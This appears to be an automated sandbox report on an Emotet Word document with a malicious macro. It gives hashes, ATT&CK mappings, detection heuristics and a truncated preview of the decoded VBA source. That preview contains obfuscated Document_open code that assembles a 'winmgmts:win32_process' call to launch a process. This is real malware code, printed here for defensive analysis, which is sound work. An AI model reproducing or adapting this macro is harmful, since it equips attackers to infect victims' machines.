Emotet Office (OOXML) malware analysis — malicious · c2df685c5bf5cfb0

MALICIOUS

Office (OOXML)

127.0 KB Created: 2020-02-03 17:08:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24

MD5: 8d38bdcca78f84461d371f7366bc765c SHA-1: f08dbed18620d9f54dc7ff328b1f67d0bff9a4cb SHA-256: c2df685c5bf5cfb0c1ca51118efa8e408be83e08eb9d514cf0cd97fdb8d26cdd

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with a Document_Open macro, which is a common technique for Emotet. The macro executes obfuscated VBA code that likely downloads and executes a second-stage payload. ClamAV detection further confirms the malicious nature and identifies it as Emotet.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7576678-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7576678-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	10595 bytes
SHA-256: `223137c18a1c5549cfb193504b8c9656e3eb64a803fb949dfcc2c976f48e0500`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Uopbuhiaarlys" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Atr6258312758 = "{Pita Jeremo 777}" + "Inbs" Atr6258312777 = (780) + 597 Atr625831282 = "{Pita Jeremo 777}" + "juigj" Atr625831224 = ("{Pita Jeremo 777}") Atr625831223 = 204 + 997 + 882 Atr6258312345 = (Apptrupyaaw) + Atr625831282 Atr62583126 = Gowkdmzrhlitu + Dmlqdcibz + Hytjylte Atr625831243 = ("{Pita Jeremo 777}") Atr625831299 = (572) + 181 Atr62583123445 = (954) + 713 Atr62583122345 = ("{Pita Jeremo 777}") Nckglmlc.Gfvejolgenpst End Sub Attribute VB_Name = "Oyezdosveo" Attribute VB_Base = "0{93E3D46E-AFE8-4A62-87C4-546718B5EAA2}{994E04AC-F287-4A09-A6F0-3B10DD9128C6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Nckglmlc" Function Gfvejolgenpst() Atr6258312758 = "{Pita Jeremo 777}" + "Inbs" Atr6258312777 = (845) + 456 Atr625831282 = "{Pita Jeremo 777}" + "juigj" Atr625831224 = ("{Pita Jeremo 777}") Atr625831223 = 94 + 484 + 361 Atr6258312345 = (Pftsucviiqw) + Atr625831282 Atr62583126 = Zwicjton + Vtuatkspb + Iugllnmf Atr625831243 = ("{Pita Jeremo 777}") Atr625831299 = (52) + 184 Atr62583123445 = (862) + 585 Atr62583122345 = ("{Pita Jeremo 777}") Eyrhwhjnxpjan = "^348^288^836^234wi^348^288^836^234nm^348^288^836^234g^348^288^836^234mt^348^288^836^234" + ChrW(Oyezdosveo.Zoom + 15) + "^348^288^836^234:w^348^288^836^234in^348^288^836^23432^348^288^836^234_" + Oyezdosveo.Xfaxdswp + "r^348^288^836^234oc^348^288^836^234e^348^288^836^234s^348^288^836^234s" Atr6258312758 = "{Pita Jeremo 777}" + "Inbs" Atr6258312777 = (102) + 748 Atr625831282 = "{Pita Jeremo 777}" + "juigj" Atr625831224 = ("{Pita Jeremo 777}") Atr625831223 = 118 + 991 + 737 Atr6258312345 = (Vitdnusa) + Atr625831282 Atr62583126 = Mybolteki + Qmcuuhwyr + Hgpubuql Atr625831243 = ("{Pita Jeremo 777}") Atr625831299 = (759) + 545 Atr62583123445 = (576) + 69 Atr62583122345 = ("{Pita Jeremo 777}") Qncepwyxshma = Yeyoniiovm(Eyrhwhjnxpjan) Atr6258312758 = "{Pita Jeremo 777}" + "Inbs" Atr6258312777 = (812) + 715 Atr625831282 = "{Pita Jeremo 777}" + "juigj" Atr625831224 = ("{Pita Jeremo 777}") Atr625831223 = 867 + 149 + 666 Atr6258312345 = (Vcyndjkinazv) + Atr625831282 Atr62583126 = Eekdfxrexzg + Pblcptvnejzr + Syjdrucdtm Atr625831243 = ("{Pita Jeremo 777}") Atr625831299 = (212) + 942 Atr62583123445 = (281) + 77 Atr62583122345 = ("{Pita Jeremo 777}") Set Gqobkzsslt = GetObject(DC + Qncepwyxshma) Atr6258312758 = "{Pita Jeremo 777}" + "Inbs" Atr6258312777 = (876) + 262 Atr625831282 = "{Pita Jeremo 777}" + "juigj" Atr625831224 = ("{Pita Jeremo 777}") Atr625831223 = 792 + 697 + 460 Atr6258312345 = (Mkgjzubgmuv) + Atr625831282 Atr62583126 = Oucohmqjsc + Rjizpcruruuua + Msanfyrx Atr625831243 = ("{Pita Jeremo 777}") Atr625831299 = (84) + 154 Atr62583123445 = (742) + 300 Atr62583122345 = ("{Pita Jeremo 777}") Ohnlujlsxqdx = Oyezdosveo.Dwdkkyncw.Tag Atr6258312758 = "{Pita Jeremo 777}" + "Inbs" Atr6258312777 = (17) + 843 Atr625831282 = "{Pita Jeremo 777}" + "juigj" Atr625831224 = ("{Pita Jeremo 777}") Atr625831223 = 862 + 56 + 964 Atr6258312345 = (Ptklahoso) + Atr625831282 Atr62583126 = Ubbubces + Bncuwmlxhdhmf + Tagrtwncuycqr Atr625831243 = ("{Pita Jeremo 777}") Atr625831299 = (402) + 552 Atr62583123445 = (241) + 303 Atr62583122345 = ("{Pita Jeremo 777}") Rylaotsjpmwkg = Qncepwyxshma + ChrW(Int(wdKeyS)) + Oyezdosveo.Ejukamlfqvzbk.Tag + Ohnlujlsxqdx Atr6258312758 = "{Pita Jeremo 777}" + "Inbs" Atr6258312777 = (269) + 67 Atr625831282 = "{Pita Jeremo 777}" + "juigj" Atr625831224 = ("{Pita Jeremo 777}") Atr625831223 = 364 + 218 + 563 Atr6258312345 = (Lvxmqqwgd) + Atr625831282 Atr62583126 = Iwh ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	51200 bytes
SHA-256: `f50e7e8750d798c3f789c359a30c789564ae4a79cf8830f5e4bb0ba82ae4344a`
Detection ClamAV: Doc.Downloader.Emotet-7576678-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.